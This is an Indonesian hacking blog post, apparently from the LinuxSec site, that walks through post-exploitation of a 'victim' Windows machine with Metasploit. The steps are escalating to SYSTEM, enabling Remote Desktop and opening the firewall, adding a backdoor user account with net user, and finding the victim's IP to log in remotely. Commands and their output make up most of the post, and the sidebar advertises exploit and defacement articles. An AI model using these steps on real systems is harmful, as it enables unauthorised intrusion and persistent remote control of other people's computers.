• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Mendapatkan Akses Remote Desktop Dengan Metasploit

March 31, 2016 by Jack Wilder 3 Comments

kali ini masih seputar metasploit. Yaitu lanjutan setelah kita mendapatkan meterpreter session di victim. Kita bisa menggunakan fitur getgui nya msf untuk menambahkan user dan mengontrol desktop korban .

Pertama, kita pastikan dulu kita telah mendapat hak akses system di victim, bukan user biasa.

meterpreter > getuid
Server username: WIN-IA0JPLFHM2GUzumaki
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

Lalu masukkan command untuk menambahkan username dan password :

run getgui -u <username> -p <password>

tapi disini saya mengalami error ketika menambahkan user dan password dengan metode tersebut.

meterpreter > run getgui -u nagisa -p linuxsec
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[-] Unexpected windows error 1332
[-] Error in script: NoMethodError undefined method `[]’ for nil:NilClass

Kita pakai cara lain.
Pertama, kita enable remote desktop nya dengan getgui.

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it …
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto …
[*] Opening port in local firewall if necessary

Selanjutnya masuk ke cmd shell.

meterpreter > shell
Process 332 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:Windowssystem32>

Lalu tambahkan user dan password dengan command :

net user <username> <password> /add

C:Windowssystem32>net user nagisa linuxsec /add
net user nagisa linuxsec /add
The command completed successfully.
C:Windowssystem32>

Sekarang kembali ke meterpreter shell.

C:UsersUzumakiDesktop>^C
Terminate channel 5? [y/N]  y
meterpreter >

Lalu masukkan command ipconfig untuk mengetahui ip korban.

meterpreter > ipconfig

Langkh terakhir adalah mengakses desktop victim dengan user dan password serta ip yang sudah kita atur.
Silahkan gunakn remote desktop client kesukaan kalian, bisa rdesktop, remmina, dll.

Sekian tutorial kali ini, semoga bermanfaat. Share juga ke teman teman mu biar mereka tau.

Filed Under: Uncategorized Tagged With: Exploit, Hacking, Metasploit, Windows

Reader Interactions

Comments

  1. l04d1ng_ darkc0d3 says

    May 9, 2016 at 6:22 am

    ini tutor saya ya om 😀 pernah saya share di kali linux indonesia dan backbox indonesia
    my nick darkc0d3

    Reply
    • chiaki says

      September 14, 2016 at 11:15 am

      tutor saya matamu

      Reply
    • Luthfi Putra says

      December 22, 2017 at 3:52 pm

      kok ngakak baca komennya yaa, ngaku-ngaku

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Zendesk Custom Domain or Subdomain Takeover

WordPress Plugin CopySafe PDF Protection Shell Upload

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Readme.io Custom Domain or Subdomain Takeover

Uptimerobot.com Custom Domain or Subdomain Takeover

Azure Traffic Manager Custom Domain or Subdomain Takeover

WordPress Army Knife CSRF File Upload Vulnerability

LinuxSec / 18 queries in 0.15 seconds